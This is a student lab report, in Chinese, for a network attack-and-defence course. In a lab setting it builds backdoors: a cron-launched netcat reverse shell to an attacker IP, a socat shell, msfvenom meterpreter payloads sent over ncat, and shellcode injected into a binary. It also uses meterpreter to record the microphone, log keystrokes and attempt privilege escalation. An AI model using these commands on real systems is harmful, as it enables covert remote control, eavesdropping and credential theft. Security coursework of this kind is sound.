2018-2019-2 20165315《網絡對抗技術》Exp2 後門原理與實踐

2018-2019-2 20165315《網絡對抗技術》Exp2 後門原理與實踐

1、實驗任務

  • 使用netcat獲取主機操做Shell,cron啓動
  • 使用socat獲取主機操做Shell, 任務計劃啓動
  • 使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
  • 使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權
  • 可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell

2、實驗步驟

一、使用netcat獲取主機操做Shell,cron啓動

在此任務中,我將kali做爲受害機,MacOS系統做爲攻擊機html

  • 在Mac終端中監聽5315號端口,命令爲nc -l 5315

  • 編輯一條定時任務,命令爲crontab -e,選擇vim.basic編輯器

  • 在編輯器中的最後一行加上06 * * * * /bin/netcat 10.0.0.165 5303 -e /bin/sh,使每一個小時的第6分鐘反向鏈接Mac主機的5315端口(我作實驗正好是第5分鐘,命令中IP地址爲攻擊機IP)

  • 1分鐘後,3點06分時,攻擊機獲取了受害機的shell操做權,攻擊成功

二、使用socat獲取主機操做Shell, 任務計劃啓動

socat簡介:linux

socat是一個多功能的網絡工具,名字來由是「 Socket CAT」,能夠看做是netcat的N倍增強版。web

socat是一個兩個獨立數據通道之間的雙向數據傳輸的繼電器。這些數據通道包含文件、管道、設備(終端或調制解調器等)、插座(Unix,IP4,IP6 - raw,UDP,TCP)、SSL、SOCKS4客戶端或代理CONNECT。socat支持廣播和多播、抽象Unix sockets、Linux tun/tap、GNU readline 和 PTY。它提供了分叉、記錄和進程間通訊的不一樣模式。shell

socat的主要特色就是在兩個數據流之間創建通道;且支持衆多協議和連接方式:ip,tcp,udp,ipv6,pipe,exec,system,open,proxy,openssl,socket等。vim

因爲個人主機是MacOS系統,故沒有按照老師的指導方法進行操做,具體操做參考自該博客windows

此項任務中我將MacOS系統做爲受害機,Kali做爲攻擊機。安全

  • 在Mac命令行中下載socat,指令爲brew install socat

  • 在受害機上執行socat tcp-l:5315 system:bash,pty,stderr指令,進行端口轉發

  • 在攻擊機中執行socat - tcp:10.1.1.165:5315,獲取受害機shell操做權(命令中IP地址爲受害機IP)

三、使用MSF meterpreter生成可執行文件,利用ncat傳送到主機並運行獲取主機Shell

Meterpreter簡介:bash

Meterpreter是Metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個Meterpreter shell的連接。網絡

Meterpreter shell做爲滲透模塊有不少有用的功能,好比打開shell、獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息等等。另外Meterpreter可以躲避入侵檢測系統。在遠程主機上隱藏本身,它不改變系統硬盤中的文件,所以HIDS[基於主機的入侵檢測系統]很難對它作出響應。Meterpreter還能夠簡化任務建立多個會話。能夠來利用這些會話進行滲透。框架

因爲MacOS系統沒法執行exe文件,故此任務我仍是用了win7的虛擬機,按照老師的指導方法進行操做。

此項任務中我將Win7系統做爲受害機,Kali做爲攻擊機。

  • 在Kali上執行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.196.188 LPORT=5315 -f exe > 20165315_backdoor.exe,生成後門程序「20155312_backdoor.exe」(命令中IP地址爲攻擊機IP)

  • 讓受害機進入接收文件模式,指令爲ncat -l 5315 > 20165315_backdoor.exe

  • 將生成的後門程序傳送到Windows主機上,指令爲nc 10.1.1.143 5315 < 20165315_backdoor.exe(命令中IP地址爲受害機IP)

  • 在Kali中再打開一個終端,使用msfconsole指令進入msf控制檯

  • 依次輸入以下指令進行配置:
# use exploit/multi/handler
//使用監聽模塊,設置payload

# set payload windows/meterpreter/reverse_tcp
//使用和生成後門程序時相同的payload

# set LHOST 192.168.192.188
//這裏用的是LinuxIP,和生成後門程序時指定的IP相同

# set LPORT 5315
//一樣要使用相同的端口

  • 輸入exploit開始監聽

  • 在win7主機中運行後門程序,攻擊機獲取受害機Shell,指令爲20165315_backdoor.exe

四、使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  • 使用record_mic指令能夠截獲一段音頻

在當前目錄下可找到存儲的音頻文件:

  • 使用webcam_snap指令可使用攝像頭進行拍照

因爲個人虛擬機是Win7系統,沒有攝像功能,而主機又是MacOS系統,找了半天都沒找到怎麼開啓攝像機...可是這個指令我已經明白如何使用,沒有截圖但願老師諒解~

  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄

  • 先使用getuid指令查看當前用戶,使用getsystem指令進行提權,因爲是Win7系統,提權失敗

五、使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell

這一項任務還在嘗試,若是作出來會有後期更新~

經過後期的嘗試與參考這個博客,任務完成過程以下~

此項任務中我將Kali的終端1做爲受害機,終端2做爲攻擊機(這是因爲Windows系統沒法執行pwn1文件)。

  • 經過MSF生成shellcode,並注入20165315pwn1,生成20165315_msf後門程序,指令爲msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.196.190 LPORT=5315 -x /root/20165315/exp1/20165315pwn1 -f elf > 20165315_msf

  • 使用msfconsole控制檯

  • 在另外一個終端中,運行生成的20165315_msf文件,會發現控制檯已獲取該終端shell權限

3、實驗中遇到的問題

在作任務三的時候,我原本想像任務二同樣,在網上找一下針對mac的攻擊教程,可是在運行到msf控制檯時,發現執行exploit指令時,因爲macOS系統沒法執行exe文件,致使kali沒法進行攻擊(這說明macOS真的安全)

後來我查到一個博客,能夠用msfvenom -p linux/x86/meterpreter/reverse_tcp lhost lport -f elf -o shell指令,雖然文件是生成了,可是...mac仍是不能運行這個文件!太安全了致使實驗作不了很難受了QAQ

解決過程:
大丈夫能屈能伸,我...最後仍是選擇了Win7虛擬機...若是有大神知道怎麼攻擊Mac麻煩在評論裏指導我一下,蟹蟹!

4、實驗總結

一、基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式?

當朋友的QQ號被盜後,攻擊者借QQ號向我發送自動下載惡意後門程序的連接,假稱這是投票連接,若是我沒有防範意識,直接點擊連接,就會自動下載惡意程序,對電腦的安全形成很大的影響。

(2)例舉你知道的後門如何啓動起來(win及linux)的方式?

Windows可使用任務計劃,或者當在運行一個含有綁定後門程序的軟件時,後門就能夠被開啓;linux可使用cron定時觸發,也能夠經過對正常軟件的綁定注入shellcode達到開啓後門的目的

(3)Meterpreter有哪些給你映像深入的功能?

能夠經過反向連接,獲取全部執行了含後門的可執行文件的主機shell操做權,從而獲得用戶密碼、上傳下載遠程主機的文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息等等。

(4)如何發現本身有系統有沒有被安裝後門?

查看開機自啓動項、任務計劃程序中是否有可疑程序;安裝專門的殺毒軟件,實時防禦;查看本機端口,判斷是否有被異常開放的端口等等。

二、實驗體會

此次實驗趣味性很強,經過學習老師教程以及學長學姐的博客,基本都可以完成實驗。在此次實驗中,我學會了利用後門程序對主機進行注入攻擊,學會了使用netcat、socat、meterpreter等,雖然內容簡單,但我已經基本瞭解後門的基本原理。在從此的學習中,我將會進一步深刻研究後門的各類理論知識。

本次實驗也讓我更加了解了一些網絡攻擊的手段,增強了網絡安全防範意識。

相關文章
相關標籤/搜索